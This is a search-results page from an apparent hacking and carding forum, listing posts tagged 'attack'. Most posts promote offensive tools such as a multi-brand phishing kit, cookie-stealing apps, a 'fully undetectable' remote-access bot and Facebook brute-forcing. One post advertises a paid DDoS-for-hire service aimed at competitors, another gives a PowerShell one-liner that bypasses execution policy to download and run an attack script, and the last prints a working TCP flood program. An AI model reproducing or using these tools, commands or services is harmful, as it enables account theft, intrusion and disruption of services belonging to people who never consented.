Search the Community

Showing results for tags 'attack'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
    • Moderators
    • Staff
    • Administration
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Pentesting Zone
  • Security & Anonymity
  • Operating Systems | Hardware | Programs
  • Graphic Design
  • vBCms Comments
  • live stream tv
  • Marketplace
  • Pentesting Premium
  • Modders Section
  • PRIV8-Section
  • Pentesting Zone PRIV8
  • Carding Zone PRIV8
  • Recycle Bin

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me


Location


Interests


Occupation


TeamViewer


Twitter


Facebook


Youtube


Google+


Tox

Found 36 results

  1. dEEpEst

    WhatsApp SS7 Attack

    [Hidden Content] Video shows a way of obtaining WhatsApp data by attacking a part of the backbone of telecoms networks known as SS7. Hack shown off here by Positive Technologies and full story on how to protect yourself from SS7 attacks here (this video is not a tutorial on how to hack others, which is illegal):
  2. Wifipumpkin3 wifipumpkin3 is a powerful framework for rogue access point attack, written in Python, that allows and offers to security researchers, red teamers, and reverse engineers to mount a wireless network to conduct a man-in-the-middle attack. Main Features Rogue access point attack Man-in-the-middle attack Rogue Dns Server Captive portal attack (captiveflask) Intercept, inspect, modify and replay web traffic WiFi networks scanning DNS monitoring service Credentials harvesting Transparent Proxies LLMNR, NBT-NS and MDNS poisoner (Responder3) and more! Changelog v1.0.7 Added added WorkProcess class for execute comand with Qprocess added correctly package beautifulsoup4 into requirements.txt added command banner: display an awesome wp3 banner added many improvements into system modules added improves module for running in background added command kill: terminate a module in background by id added option on captiveflask to force redirect sucessful template added set ssid with any caracter utf8 Changed moved command info to extensions directory changed more flexible python version into dependencies #36 improves the architecture files extensions commands Deprecated Removed removed folder core/controls from file structure arch removed bs4==0.0.1 Dummy package for Beautiful Soup Fixed fixed improves method setIptables from wirelessmode default mode fixed clear dependencies not used from requirements files fixed include message: the module not found or failed to import. fixed typo name proxys to proxies fixed version of dnslib from pydns_server #49 restricting version module problems fixed description tool on setup.py file fixed mode docker parser command line #56 [hide][Hidden Content]]
  3. Skeleton is a Social Engineering tool attack switcher Type: Phishing Tool Websites languages: English, French Attack Switcher for phishing: Facebook, Linkedin, Twitter, Pinterest, Google, Instagram, Microsoft, Netflix, Paypal, Wordpress, Amazon, Ebay, CyberghostVPN, NordVPN, ExpressVPN, ZenmateVPN, PCS, N26, Roblox, Steam, Binance, Etoro, Bittrex, Coinbase. DISCLAMER: Program for educational purposes!!! Your account security is our top priority! Protect your account by enabling 2FA. Skeleton 1.7 Ver:.....1.7 coder:...KURO-CODE BugFix, Script revision Add: Paypal, Wordpress, Amazon, Ebay, CyberghostVPN, NordVPN, ExpressVPN, ZenmateVPN, PCS, N26, Roblox, Steam, Binance, Etoro, Bittrex, Coinbase [hide][Hidden Content]]
  4. EvilApp - Phishing Attack Using An Android App To Grab Session Cookies For Any Website (ByPass 2FA) Man-in-the-middle phishing attack using an Android app to grab session cookies for any website, which in turn allows to bypass 2-factor authentication protection. EvilApp brings as an example the hijacking and injection of cookies for authenticated instagram sessions. [HIDE][Hidden Content]]
  5. Self-XSS - Self-XSS Attack Using Bit.Ly To Grab Cookies Tricking Users Into Running Malicious Code How it works? Self-XSS is a social engineering attack used to gain control of victims' web accounts by tricking users into copying and pasting malicious content into their browsers. Since Web browser vendors and web sites have taken steps to mitigate this attack by blocking pasting javascript tag, I figure out a way of doing that using Bit.ly, so we can create a redirect pointing to "website.com/javascript:malicious_code". If the user is tricked to run the javascript code after "website.com/" the cookies of its authenticated/logged session of website.com will be sent to the attacker. Features: Port Forwarding using Ngrok and shortner using Bitly.com (Register for free) [HIDE][Hidden Content]]
  6. Brute Force Attack on Facebook Accounts Note: EMAIL = ID = PHONE [HIDE][Hidden Content]]
  7. Paradoxia Console Features Multithreaded, You can get multiple sessions. Configuration file BOT information database. Root Shell. Easy to use. Interact with online BOTs in a session. Kill a BOT. Blacklist BOT IP Adresses from connecting. Scan Connected IP if you do not get a session seconds after it connected. Get Desktop Notification if a new BOT connects. Build BOT with Host and Port easily. Enable/Disable and change settings in paradoxia.ini ( verbose, Auto print bot information on connect, BOT password, etc) Paradoxia Windows Bot Features NOTE : Do not upload the BOT to online scanners! Fully Undetectable. View System Information. Persistence. Stealth. Usb Infection. File System Browsing. File Upload. File Download. Command Executing. Powershell Executing. Get PID of Process. Kill a Process. Screenshot. Mic Recording. Paradoxia IRIS Features Mass Emailing with either legitimate or malacious Attachment. Mass Emailing with or without an Email List. Random Brute Force Discovery : Discover Instagram Usernames. Random Brute Force Discovery : Discover Instagram Usernames and do a quick Brute Force on them with weak Passwords to possibly discover the Password. Instagram Brute Force over Tor. Paradoxia LoginDataText Features Get information from ANY 'Login Data' File from Google Chrome. Information such as URLS and Emails. Paradoxia Thawne Features Undetectable. Persistent. Runs in background. A type of Logic Bomb with no harmful effects. Run your file if it's not running on the System. Download your file if it's deleted or not running. Uses Powershell to Download file. [HIDE][Hidden Content]]
  8. Host Header Attack Vulnerability Demonstration | POC | Penetration Testing Video Tutorial [Hidden Content]
  9. U.S Launched Cyber Attack on Iranian Military Computers After U.S Military Drone Shot Down by Iran ️United States Military launched a cyber attack on the Iranian Military computers that used to control the Iran missiles after the $240 million Worth U.S drone shootdown by Iran. ️The attack was mainly targeting the Iran military computer systems with the approval of U.S president Trump and the cyber-attack disabled computer systems controlling rocket and missile launchers.
  10. w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities. Video: [Hidden Content] Download: [HIDE][Hidden Content]]
  11. SKA - Simple Karma Attack SKA allows you to implement a very simple and fast karma attack. You can sniff probe requests to choice the fake AP name or, if you want, you could insert manually the name of AP (evil twin attack). When target has connected to your WLAN you could active the HTTP redirection and perform a MITM attack. Details The script implements these steps: selection of NICs for the attack (one for LAN and one for WAN) capture of probe-requests to choice the fake AP name (tcpdump) activation of fake AP (hostapd and dnsmasq) the new AP has a DHCP server which provides a valide IP to the target and prevents possible alerts on the victim devices activation of HTTP redirection (iptables) only HTTP requests are redirect to fake site, while the HTTPS traffic continues to route normally activation of Apache server for hosting the phising site at the end of the attack the script cleans all changes and restores Apache configuration Screenshots FAQ SKA alerts you if there are some problems with NetworkManager demon or Apache configuration file. Anyway you could find the answers to your problems in the links below:[Hidden Content] In summary Disable DNS line in your NetworkManager configuration file (look into /etc/NetworkManager/): #dns=dnsmasq Insert the MAC of your wireless adapter between the unmanaged devices to allow hostapd works properly: unmanaged-devices=mac:XX:XX:XX:XX:XX:XX Source && Download [hide][Hidden Content]]
  12. ACsploit: a tool for generating worst-case inputs for algorithms ACsploit is an interactive command-line utility to generate worst-case inputs to commonly used algorithms. These worst-case inputs are designed to result in the target program utilizing a large amount of resources (e.g. time or memory). ACsploit is designed to be easy to contribute to. Future features will include adding arbitrary constraints to inputs, creating an API, and hooking into running programs to feed worst-case input directly to functions of interest. [Hidden Content]
  13. [Hidden Content]
  14. [Hidden Content]
  15. Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH). Disclaimer Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only. [HIDE][Hidden Content]]
  16. F B I

    The Shadow Attack Framework

    [Hidden Content]
  17. Good day, we bring to your attention our service that has been operating since 2012 and knows its business! Services to eliminate the sites and forums of your competitors using DDOS attacks. We take on almost any projects ranging from weak to servers with high protection! Our service is a quick solution to your problems with competitors and enemies. Wholesale customers individual conditions! * Additional services (we specify by the specified contacts whether we provide at the moment and the price for them): - flood of phone calls (the line is constantly loaded and no one can get through to the phone is constantly busy). - spam mailing. The advantages of our service - We work with the guarantor. - Low prices (from $ 50) - 24-hour order taking - 100% Anonymity - Hour monitoring of all attacked resources - We work with all types of attacks - Prompt MoneyBack (refund) in case of failure. - Attacked resources during the attack do not show signs of life, as is often the case with others. - Regular discounts. Types of attack. - SYN, UDP, DNS Amplification, Spoofed UDP, Spoofed SYN, XML-RPC, HTTP, GET, POST, TCP ACK / Reflection, DNS Amplification and more ... - We provide a test for 5-10 minutes only to trusted customers or people with a reputation. -For the rest of the test paid - $ 10 The amount will be reckoned when paying for the ordered period. -In case of an unsuccessful test and other force majeure situation, the money for the test will be returned. Prices for weak resources. Day (from) - 50 USD - Day - from $ 50 <<< Week (from) - 300 USD - Week - from $ 300 <<< Month (from) - 1000 USD - Month - from $ 1000 <<< Prices for average resources. Day (from) - 100 USD - Day - from $ 100 <<< Week (from) - 500 USD - Week - from $ 500 <<< Month (from) - 1600 USD - Month - from $ 1600 <<< Protected prices. Day (from) - 200 USD - Day - from $ 200 <<< Week (from) - 1000 USD - Week - from $ 1000 <<< Month (from) - 2500-3000 USD - Month - from 2500-3000 $ <<< Payment Methods - BTC - QIWI -ALLCOIN Our contacts - ICQ 266-444 - Telegramm [Hidden Content] - Jabber [email protected] - Telegramm (https: // t. Me / Liberty789) for not registered to remove spaces. Passed service checks, reviews of administrators, guarantors: [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]
  18. Introduction Bully is a new implementation of the WPS (Wifi Protected Setup) brute force attack. It’s almost identical as other already existing WPS brute force attack tools, but Bully represents an improved version of Reaver and includes a few advantages. You can take a look at Brute Force Attack Against WPS – Reaver, to see its features and compare them to the Bully. WPS (Wifi Protected Setup) WPS was introduced in 2006, and the goal of the protocol is to allow home users who know little of wireless security to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. In December 2011 a flaw was revealed that affects wireless routers with the WPS feature. That flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network’s WPA/WPA2 pre-shared key [HIDE][Hidden Content]]
  19. SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server . The impact SQL injection can have on a business is far reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business. In this course, you will perform SQL injection attacks on websites . This course is a practical course in which you are going to perform practicals based on sql injection attack . NOTE: This course is created for educational purposes only . NOTE: This course is a product of Sunil Gupta and no other organisation is associated with it or a certification exam. Although, you will receive a Course Completion Certification from Udemy. Who is this course for? Ethical Hackers Pentesters Web Security Specialists [Hidden Content]
  20. python facebom.py -t [email protected] -w wlist.txt -p 35.236.37.121 [Hidden Content]
  21. AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide. Requirements Powershell 4.0 or higher Changes Version 4.8 • Compatibility with Powershell 4.0 • Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.) • Automatic exclusion in Windows Defender (4 different methods) • Remote execution without password for PSexec, WMI and Invoke-Command • New available attack: DCOM Passwordless Execution • New available module: Remote Access / Metasploit Web Delivery • New module available: Remote VNC Server (designed for legacy environments) • Autocomplete the host, user and password fields by pressing Enter • It is now possible to run the tool without administrator privileges with the -noadmin parameter *The rest of the changes can be consulted in the CHANGELOG file Use This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks. One line execution: powershell -ep bypass "cd $env:temp ; iwr [Hidden Content] -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1" The detailed guide of use can be found at the following link: [Hidden Content] [HIDE][Hidden Content]]
  22. dEEpEst

    BIRTHDAY ATTACK

    BIRTHDAY ATTACK [Hidden Content]
  23. dEEpEst

    DICTIONARY ATTACK

    [Hidden Content]
  24. dEEpEst

    DDos Attack

    Imports System.Net Imports System.Net.Sockets Module Module1 Sub Main() Console.ForegroundColor = ConsoleColor.Blue Console.ForegroundColor = ConsoleColor.Green Console.WriteLine("IP:") Dim ip As String = Console.ReadLine Console.WriteLine("PORT:") Dim port As Integer = Console.ReadLine Dim x As Integer Do Try Dim iep As IPEndPoint iep = New IPEndPoint(IPAddress.Parse(ip), Convert.ToInt32(port)) 'target Dim s As Socket = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp) s.Connect(iep) s.Close() x += 1 Console.WriteLine("Packages Sent: " & x) Catch ex As Exception Console.ForegroundColor = ConsoleColor.Red Console.WriteLine("Packages Sent: " & x) End Try Loop End Sub End Module